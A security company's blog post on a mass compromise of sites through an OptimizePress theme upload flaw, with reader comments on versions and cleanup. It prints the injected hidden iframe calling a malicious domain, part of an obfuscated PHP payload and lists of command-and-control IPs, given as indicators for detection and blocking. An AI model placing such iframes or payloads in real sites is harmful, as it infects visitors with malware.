Recent OptimizePress Vulnerability Being Mass Infected

A few weeks ago we wrote about a file upload vulnerability in the OptmizePress theme. We were seeing a few sites being compromised by it, but nothing major.

That all changed yesterday when we detected roughly 2,000 websites compromised with iFrames that seemed to be caused by this same vulnerability. All of the contaminated websites that we have reviewed and cleared were using OptmizePress, and they all had the same iFrame injected in them:

<script> if(document.all ){ document.write ("<iframe 
 src=" httx:// gezidotojyk.org/ ohui.cgi?19" width="1" 
height="1"></iframe>"


We also saw that Google has started to blacklist the compromised sites, and just for this one iFrame variation (from gezidotojyk.org), they blacklisted almost 1,500 sites:

Has this site acted as an intermediary resulting in further distribution of malware?
Over the past 90 days, gezidotojyk.org appeared to function as an intermediary for the infection of 1442 site(s) including dalluva.com/, criesaude.com/, brownstonefitness.com/.

Has this site hosted malware?
Yes, this site has hosted malicious software over the past 90 days. It infected 1382 domain(s), including dalluva.com/, criesaude.com/, pathtoawesome.com/.

Searching for this iFrame

You shouldn’t even bother searching for this iFrame, or the normal “eval” injections you may see. This malware is a lot smarter, hiding itself using multiple encoding variations, and looks similar to this:

$UigPzaGqpe6SKfF= array("5362','5379','5358',&quit;5369');$
NBfWJmicev5SrqsFzzlYzRfOVbwwh2pZtvM2H= array('2596','2611','2598','2594','2613','2598','2592','2599','2614','2607','2596','2613','2602','2608','2607');$jLf0uwhN2GcduBVAgHBD3JvjyPEaIcVDO1u8oBLg7Nksf6S= array('6978','6977','6995','6981','6934','6932','6975','6980','6981','6979','6991','6980','6981');$EEvXCh2Cm5rvV..

When decoded, this array contacts the malware “mothership” on one of these IP’s to get the updated injection. If you have been hit, take a look at your theme and plugin files, you will likely find all of them injected with a similar payload. For ISP’s, here are the mothership IP addresses that can be blocked:

$know[] = "151.236.14.86";
                $know[] = "149.154.157.133";
                $know[] = "37.235.54.48";
                $know[] = "31.215.205.196";
Protection and Recovering

You need to update your OptmizePress installations ASAP to prevent the reinfections.

Clients using our website firewall are already protected.

The Sucuri Research Team is also analyzing the injections and we will post more details when we learn them.

Scan your website for free:
About Daniel Cid

Sucuri CTO, OSSEC Founder, open source developer and information security professional - dcid.me

  • http://www.codeforest.net Codeforest

    Could you be so kind and state that the vulnerability was present in OptimizePress version 1 and was fixed in version 1.62 in April, 2013. OptimizePress 2 is based on an entirely new secure code base.

    • Christina Hills

      I concur! This post will cause a lot of confusion for folks who have already updated to OP 1.62

      • confused dude

        What version of optimizepress is the ‘safe’ one? 1.61 or 1.62 . I’m indeed confused.

        • Christina Hills

          You know, I’m not exactly sure. I just updated to 1.62. Contact OptimizePress and find out

        • http://www.codeforest.net Codeforest

          1.62 is secure

    • Guilliam Roque

      hello conforest, the current version on the download page of OptimizePress is 1.64 as of april 03, 2014. so this follows its already fixed? pls confirm, thanks!

      • http://www.codeforest.net Codeforest

        Yes, all version after 1.61 are secure

        • Guilliam Roque

          thanks! back to work and cleaning the entire host now :(

  • AJ

    Yes it’s happened overnight to one of our sites. As per Codeforest will upgrading OptimizePress version 1 work or does int need to be V2?

    • http://www.codeforest.net Codeforest

      Fixed version is OptimizePress 1.61 (released in april,2013), current version of OptimizePress 1 is 1.62.
      OptimizePress 2 was never affected with this vulnerability.

  • Cyber “News & Alerts”

    Nice Discovery, Impressive

  • Drang Boards

    I was provided the suspicious snippet in the Google Webmaster tools, and found your write up on the issue, but to my surprise I don’t have OptimizePress in my list of plugins in wordpress. Am I missing something?

  • Bas

    Note that the IP list as mentioned on this page is only valid for the initial connection attempt. Once an infected server has connected to a ‘mothership’ it will also retrieve a list of new IP addresses and will use those as the new mothership addresses.

    At the moment those addresses are (freshly retrieved from a ‘mothership’ just minutes ago):

    5.149.250.150
    31.215.205.196
    37.235.48.74
    37.235.54.48
    46.21.146.152
    85.159.237.231
    91.200.14.122
    94.76.220.90
    95.85.39.230
    109.206.165.95
    144.76.232.49
    146.0.79.182
    149.154.152.129
    149.154.157.133
    151.236.14.86
    158.255.215.135
    178.21.23.230
    188.66.5.127
    192.243.126.38

  • http://www.friv2friv3friv4.com/ friv 2 friv 3 friv 4

    Fixed version is OptimizePress 1.61 (released in april,2013), current version of OptimizePress 1 is 1.62.
    OptimizePress 2 was never affected with this vulnerability.

  • Monika

    Well it looks as if OP 2.0 is now infected too. My site worked fine earlier this evening and now all I see is the word “array.” Any ideas how I can clean the site from this malware?

  • michael

    Nice ideas.

  • http://marketingwithsergio.com/ Sergio Félix

    My Optimize Press site is infected (whenever I load the site for the first time, there’s a legend about displaying cookies, whatever you click -accept or decline- then a link appears) and I always update as soon as there’s a new release.

    Problem is, MediaTemple were “kind enough” to let me know they can’t do anything about it or charge me with $175 to have it fixed.

    Needless to say, I moved from Hostgator to get superior support and a friend of mine who is hosted with HG and was having the same exact problem, got it fixed for FREE by the HG guys.

    The irony on this one is KILLING ME.

  • jeffatrackaid

    We’ve been seeing this with a customer using OptimizePress. A major issue is that they use add-on domains in cPanel under a single cPanel account (despite having their own dedicated server). As a result, every add-on domain in the account was hit.

    Another thing we found is hackers uploading PHP shell backdoors. These files can be spotted by having PHP files in various upload/cache directories.

    We have some initial evidence that attackers are uploading these backdoors and then using them later to re-exploit the server — even after you’ve patched things up.

    Unfortunately, remote scanning does not detect these files. We’ve had to use various on-server scanning tools as well as manually searching for certain string patters in the code injections.

  • http://www.pqInternet.com Fred Black

    Thanks for posting this. I’ve been fighting this for a while. I have 1 site on a windows server that used the pre patched version of OptimizePress. The infection spread to other wordpress sites not using optimizepress that are on the same server.

    I found the infection by searching for this string: =’);?> i It’s at the end of the encrypted php that gets put in files such as index.php, wp-config.php, etc. If you do a text search on *.php files looking for that string you will find the infected sites.

    I cleaned all this up several weeks ago, only to find that the site with OptimizePress had become infected again. It had not infected other sites yet. It left a php file in the root of the site with a name I didn’t recognize and that’s where I found the ip addresses that when searched on led me to this blog post. After reading this post, I updated OptimizePress.

    What else does this infection put on the server? My server stops responding several times a day for about 2 minutes and then is fine until the next hang up. What else can I use to find code this exploit uses?